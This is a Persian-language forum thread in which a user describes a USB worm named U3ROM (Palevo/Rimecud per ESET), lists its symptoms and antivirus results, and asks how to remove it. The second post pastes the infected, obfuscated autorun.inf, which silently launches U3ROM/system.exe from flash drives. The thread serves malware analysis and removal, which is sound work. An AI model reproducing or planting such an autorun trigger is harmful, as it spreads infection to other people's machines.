-
ویروس U3ROM
این ویروس رو از فلش یکی از دوستام گرفتم! لعنت به کاسپر و اتوران ویروس ریمور که بیخودی بهشون مطمئن شدم و با خیال راحت فلش رو زدم به کامپیوترم!
علائم ابتدایی :
به نظر هیچ مشکلی نیست و سیستم روبه راه هست.
وقتی یه فلش غیر آلوده رو میزنم به کامپیوتم توش یه دون Autorun.inf و یه دونه پوشه به اسم U3ROM تولید میشه که داخل پوشه مذکور یه دونه فایل آیکن default.ico و یه دونه هم system.exe تولید میشه.
خوشتختانه با بقیه درایوهای هارد کاری نداره!
فلش رو نمیشه فرمت کرد و میگه فایل های داخلش توسط یه برنامه دیگه در حال اجرا شدن هست
نود سی و دو که داداشم استفاده میکنه به راحتی فلش آلوده رو پاک میکنه.
اینم از ویروس توتال :
کد:
http://www.virustotal.com/file-scan/report.html?id=3e553af061e8f03399af4632209b6f0aa2de8846265f3c059fb0da860e24a886-1298021328
من که راه جمع و جور و درست و حسابی برای پاک کردنش پیدا نکردم. اگه راهی بلدین کمک کنین.
با تشکر
-
عجب ویروس بی پدر مادری هستش! یه سری اطلاعات جدید در موردش کشف کردم و به نظر میاد که فقط NOD میتونه از پسش بربیاد و کاسپر و اتوران ویروس ریمور (حتی ورژن 3 که فقط میتونه جلوی آلوده شدن کامپیوتر رو بگیره و قادر به حذفش نیست!) نتونستن کاری بکنن!این از اطلاعات این ویروس از سایت نود :[code]http://www.eset.eu/encyclopaedia/win32-bflient-k-p2p-worm-palevo-avir-w32-pilleuz-gen11-trojan-rimecud-a?lng=en[code/]این داخل فایل autorun.inf بود :[code];dpfTPORmL9Dh5Bhnq2UiqAp5zQoJttOIYvhejP3P3ZysrgOsS 3oPi9WHkjf5015Pnl9%6rrG2e6rj6g3HE&!C293cWtMvT9nTZk aOrvs*nua0C3TY0XF%Kuz$oNrYpm\lV=66q8[autorun]open=U3ROM/system.exe ;rKMUSftDUxBgACPrKwTQTHrVBT2wqFjrp52ldChn6jEjzKhj6 BQPZCBv0y7D5o3ROdpfTPORmL9Dh5Bhnq2UiqAp5zQoJttOIYv hejP3PZnxvKHzvMlgHsVF3GjhrL3jZl5MQm7EIuiOkKGhdkuAT 5giwdDZqwrRinbKqBEo80PovglhGTjvDx9ZbOcdrUY7rqvqpfU 6icon=U3ROM/default.ico;jdkaZysrgOsS3oPi9WHNrYpmkjfjkasdfhacti on=Open;1s0PSq7YZysrgOsS3oJi324e4q0Zjb1QvcA$f8Xg#H 9csGq6^rSf7$P0R@PnbPj@sQIRD3N&ClQs38H0NdA0Pi9WHNrY pmdP5v8736B4yu4d2I2308cT\8shell\\open\\command=U3R OM/system.exeshell\\explore\\command=U3ROM/system.exeuseautoplay=1:GOTO NUL;]2y3!TX#9S@01x0sxhF&30Xh8Ta6wtd@VRPNze5iKEfSNXIs2iO Z61Yk96puJBnWnRo2Q3ZysrgOsS3oPi9WHkjf5015Pnl9%6rrG 2e6rj6g3HE&!C293cWtMvT9nTZkaOrvs*nua0C3TY0XF%Kuz$o NrYpm\lV=66q8[code/]بازم اطلاعات جدید ارائه خواهم داد.